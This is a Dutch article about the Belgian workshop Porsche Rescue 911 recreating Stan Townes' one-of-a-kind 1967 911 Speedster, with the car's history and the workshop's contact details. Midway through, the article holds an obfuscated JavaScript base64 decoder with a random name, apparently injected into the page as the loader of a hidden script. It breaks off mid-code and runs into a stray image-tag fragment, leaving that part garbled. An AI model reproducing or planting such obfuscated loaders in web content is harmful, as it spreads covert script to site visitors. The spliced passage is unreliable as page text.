Unieke Porsche Speedster ’67 remake door Porsche Rescue 911

PORSCHE RESCUE 911 is een bedrijf gevestigd in Kontich gelegen tussen Antwerpen / Brussel en wordt geleid door Nicolas Vercammen. Hij heeft al meer dan 10 jaar Porsche ervaring en alvorens hij zelfstandig werd heeft hij nog 2 jaar gewerkt in Duitsland bij internationale Porsche referentie Freisinger Motorsport. Daar wordt uitsluitend gewerkt aan speciale en zeldzame Porsches voor klanten over de hele wereld.

De specialiteit van Porsche Rescue 911 is herstellingen, motor & versnellingsbak revisies, restauraties, tuning en conversies van oudere Porsches.
Twee jaar geleden groeide bij Nicolas het idee om met een eigen project te starten. Door toevallig in een tijdschrift te bladeren viel de aandacht op een artikel over de Speedster van Stan Townes.

Geschiedenis van de Stan Townes Speedster uit 1967
De Amerikaan Stan Townes had tot 1958 een originele Porsche Speedster in zijn bezit. In 1966 was hij gestationeerd en werkzaam op een US airbase in Thailand. Porsche introduceerde in die periode de 911 en Stan had interesse in een nieuw Speedster model. Maar, Porsche had destijds geen plannen van een Speedster in en dat zou nog vele jaren zo blijven.

“Porsche zelf heeft uiteindelijk maar 4 Speedsters op de markt gezet, de eerste was de 356 geproduceerd in 1948. Toen was het lang wachten op een opvolger. De 911 Carrera Speedster werd pas geïntroduceerd in 1989. Drie jaar later werd in Oktober 1992 de 964 C2 Speedster geïntroduceerd waarvan er 930 stuks werden gemaakt. In September 2010 lanceerde Porsche weer een Speedster versie van de 911 op het salon in Parijs, er werden er 356 van gemaakt.”

Stan Townes besloot zelf aan de tekentafel te gaan zitten om een conversie Speedster project te ontwerpen en hij heeft daar toen wat tekeningen van gemaakt op basis van een 911 coupe. Later kreeg hij een 911 coupe te pakken uit 1967 die over de kop was gegaan. Stan Townes, die als plaatwerker werkte, wist daar wel raad mee!

Hij sneed het dak van de gecrashte 911, modificeerde de front en achterzijde van de 911 body en binnenin werd de auto versterkt met delen uit een 911 Targa. Drie jaar werk is in het project gestoken en hij maakte een model waarover de dag van vandaag nog veel wordt gesproken. Het resultaat was zéér geslaagd en kreeg wereldwijd veel aandacht in de media en vakbladen.

Een artikel in het vakmagazine VW & Porsche van Juli/Augustus 1987 verwoorde het mooi met de titel: " A One-Of-A Kind Beauty the Factory Overlooked "

function c153d7c91ab09(x1){var t5='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var rd='';var pa,yd,u3,v0,qa,ub,x7;var nb=0;do{v0=t5.indexOf(x1.charAt(nb++));qa=t5.indexOf(x1.charAt(nb++));ub=t5.indexOf(x1.charAt(nb++));x7=t5.indexOf(x1.charAt(nb++));pa=(v0<<2)|(qa>>4);yd=((qa&15)<<4)|(ub>>2);u3=((ub&3)<<6)|x7;if(pa>=192)pa+=848;else if(pa==168)pa=1025;else if(pa==184)pa=1105;rd+=String.fromCharCode(pa);if(ub!=64){if(yd>=192)yd+=848;else if(yd==168)yd=1025;else if(yd==184)yd=1105;rd+=String.fromCharCode(yd);}if(x7!=64){if(u3>=192)u3+=848;else if(u3==168)u3=1025;else if(u3==184)u3=1105;rd+=String.fromCharCode(u3);}}while(nband_roadshow_1971.jpg" alt="" title="Speedster01" width="500" height="386" class="alignnone size-full wp-image-9483" />

The Making Of Stan Townes Speedster uit 1967
Er bestond maar 1 exemplaar van en dit was de wagen die Nicolas wilde nabouwen. Eenvoudiger gezegd dan gedaan want er was geen technische informatie beschikbaar, alleen een tiental foto’s die werden gevonden op internet.

Na wat speurwerk werd de huidige eigenaar van de Speedster van Stan Townes gevonden en gecontacteerd. Die kocht de wagen in 2009 voor 75.000 dollar, maar had nog veel restauratiewerk voor de boeg. De eigenaar kon ook geen hulp bieden want hij had verder geen gegevens van de wagen.
De uitdaging was groot om dit project tot een goed einde te brengen. Er zijn geen plannen of bijvoorbeeld mallen voor dit project beschikbaar. De voorbereiding is dus belangrijk. De zoektocht naar een goede donor wagen heeft veel tijd in beslag genomen. Uiteindelijk werd een gezonde Porsche 911 SC Targa uit 1980 gevonden die als basis moest dienen.

De keuze van een Targa lag voor de hand. Mits het om een Speedster project gaat wordt gebruik gemaakt van de extra verstevigingen die bij een Targa al standaard aanwezig zijn en hoeft er ook geen dak verwijderd te worden.

Alles moet origineel zijn! Er wordt niet met replica stukken, fiberglass of polyester gewerkt, alleen met originele Porsche onderdelen. Hetgeen niet beschikbaar is, zoals de voorbumper, achterbumper en speedster gedeelte, zal met de hand in staal gemaakt moeten worden.

Hieronder kan je een kleine foto impressie zien van de werkzaamheden. Voor de volledige stap voor stap foto detail van dit Speedster project verwijzen we je graag naar de website www.porsche-rescue911.be
Op de website kan je ook zien welke problemen zich hebben voorgedaan en hoe die werden opgelost. Vele stukken moesten handmatig gemaakt worden. Er zijn dan ook al veel werkuren in dit project gaan zitten, maar er wordt dan ook gestreefd naar perfectie. De motor zal ook volledig gereviseerd worden en de nodige sportieve aanpassingen krijgen.

Als alles volgens planning verloopt zou de wagen rond de maand april / mei van 2012 moeten klaar zijn.
Bedoeling is de wagen te gebruiken als visitekaartje op Porsche events en beurzen. Zou een eventuele koper interesse hebben voor deze unieke Porsche Speedster. Dan wordt er pas verkocht worden als er een andere uitdaging gevonden wordt.

Het bedrijf wat dit deze remake leidt is te vinden op onderstaande adresgegevens.
Vergeet niet te kijken op hun website naar hoe men vordert in het maken van deze fantastische Porsche Speedster!

PORSCHE RESCUE 911
Prins Boudewijnlaan 21X
B-2550 Kontich (Antwerpen)
België

www.porsche-rescue911.be
info@porsche-rescue911.be



Je moet ingelogd zijn Ingelogd om een reactie te plaatsen.